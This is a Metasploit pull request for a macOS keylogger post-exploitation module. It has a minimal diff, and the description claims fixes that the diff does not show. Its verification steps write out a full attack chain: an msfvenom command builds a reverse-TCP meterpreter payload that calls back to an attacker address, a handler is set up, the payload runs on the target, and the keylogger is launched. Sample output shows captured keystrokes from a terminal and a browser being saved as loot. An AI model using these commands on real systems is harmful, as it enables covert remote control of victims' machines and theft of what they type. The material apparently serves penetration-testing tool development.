### PR TITLE
Fixing broken imports for keylog_recorder.rb and improving control chars

### DIFF
--- a/modules/post/osx/capture/keylog_recorder.rb
+++ b/modules/post/osx/capture/keylog_recorder.rb
@@ -100,9 +100,8 @@ class MetasploitModule < Msf::Post
           print_status "Sending USR1 signal to open TCP port..."
           cmd_exec("kill -USR1 #{self.pid}")
           print_status "Dumping logs..."
-          # Telnet is not existent in High Sierra by default
+          # Telnet is not installed in MacOS 10.13+
           log = cmd_exec("nc localhost #{self.port}")
-          print_status log
           log_a = log.scan(/^\[.+?\] \[.+?\] .*$/)
           log = log_a.join("\n")+"\n"
           print_status "#{log_a.size} keystrokes captured"


### PR DESCRIPTION
This PR addresses the issue outlined in https://github.com/rapid7/metasploit-framework/issues/6981

In more recent versions of MacOS, Carbon can't be loaded via `dlload Carbon.framework/Carbon` and instead needs to be called with `dlload '/System/Library/Frameworks/Carbon.framework/Carbon'`

The majority of the code in this PR was adopted from Empyre: https://github.com/EmpireProject/EmPyre/blob/master/lib/modules/collection/osx/keylogger.py#L73

The Empyre authors repurposed the Metasploit Ruby keylogger code in their project, but added their own custom fixes/enhancements without contributing them upstream to Metasploit. 

The remainder of the code changes improve the control character handling.

## Verification

List the steps needed to make sure this thing works

- [ ] Obtain a MacOS host for testing
- [ ] Generate a meterpreter payload for it via `msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=172.16.132.1 LPORT=4444 -f macho > /tmp/evil`
- [ ] Start `msfconsole` 
- [ ] `use exploit/multi/handler`
- [ ] `set payload osx/x64/meterpreter/reverse_tcp`
- [ ]  Set options, etc
- [ ] Run the payload on the MacOS host
- [ ] `meterpreter > run post/osx/capture/keylog_recorder`
- [ ] Notice that the keys are now correctly recorded and the payload does not crash on the MacOS system

Sample output:
```
meterpreter > run post/osx/capture/keylog_recorder

[*] Executing ruby command to start keylogger process.
[*] Ruby process executing with pid 519
[*] Entering read loop
[*] Waiting 10 seconds.
[*] Sending USR1 signal to open TCP port...
[*] Dumping logs...
[*] 5 keystrokes captured
[*] [cmd][shift]][shift][shift]
[*] Saved to /Users/user/.msf4/loot/20180412022605_default_172.16.142.232_keylog_707867.txt
[*] Waiting 10 seconds.
[*] Sending USR1 signal to open TCP port...
[*] Dumping logs...
[*] 40 keystrokes captured
[*] [enter][shift]hello[iTerm2]this[iTerm2]is[iTerm2]just[iTerm2]a[iTerm2]test[iTerm2]showing[iTerm2]that
[*] Saved to /Users/user/.msf4/loot/20180412022605_default_172.16.142.232_keylog_707867.txt
[*] Waiting 10 seconds.
[*] Sending USR1 signal to open TCP port...
[*] Dumping logs...
[*] 21 keystrokes captured
[*] myChrome]pullChrome]requestChrome]works
[*] Saved to /Users/user/.msf4/loot/20180412022605_default_172.16.142.232_keylog_707867.txt

$ cat 20180412022605_default_172.16.142.232_keylog_707867.txt
[1523525169] [iTerm2] h
[1523525169] [iTerm2] e
[1523525169] [iTerm2] l
[1523525169] [iTerm2] l
[1523525169] [iTerm2] o
[1523525169] [iTerm2]
[1523525170] [iTerm2] t
[1523525170] [iTerm2] h
[1523525170] [iTerm2] i
[1523525170] [iTerm2] s
[1523525170] [iTerm2]
[1523525170] [iTerm2] i
[1523525170] [iTerm2] s
[1523525170] [iTerm2]
[1523525171] [iTerm2] j
[1523525171] [iTerm2] u
[1523525171] [iTerm2] s
[1523525171] [iTerm2] t
[1523525171] [iTerm2]
[1523525171] [iTerm2] a
[1523525172] [iTerm2]
[1523525172] [iTerm2] t
[1523525172] [iTerm2] e
[1523525172] [iTerm2] s
[1523525172] [iTerm2] t
[1523525172] [iTerm2]
[1523525173] [iTerm2] s
[1523525173] [iTerm2] h
[1523525174] [iTerm2] o
[1523525174] [iTerm2] w
[1523525174] [iTerm2] i
[1523525174] [iTerm2] n
[1523525174] [iTerm2] g
[1523525175] [iTerm2]
[1523525175] [iTerm2] t
[1523525175] [iTerm2] h
[1523525175] [iTerm2] a
[1523525175] [iTerm2] t
[1523525177] [Google Chrome] m
[1523525177] [Google Chrome] y
[1523525177] [Google Chrome]
[1523525178] [Google Chrome] p
[1523525178] [Google Chrome] u
[1523525178] [Google Chrome] l
[1523525178] [Google Chrome] l
[1523525178] [Google Chrome]
[1523525178] [Google Chrome] r
[1523525178] [Google Chrome] e
[1523525179] [Google Chrome] q
[1523525179] [Google Chrome] u
[1523525179] [Google Chrome] e
[1523525179] [Google Chrome] s
[1523525180] [Google Chrome] t
[1523525180] [Google Chrome]
[1523525181] [Google Chrome] w
[1523525181] [Google Chrome] o
[1523525181] [Google Chrome] r
[1523525181] [Google Chrome] k
[1523525181] [Google Chrome] s
```

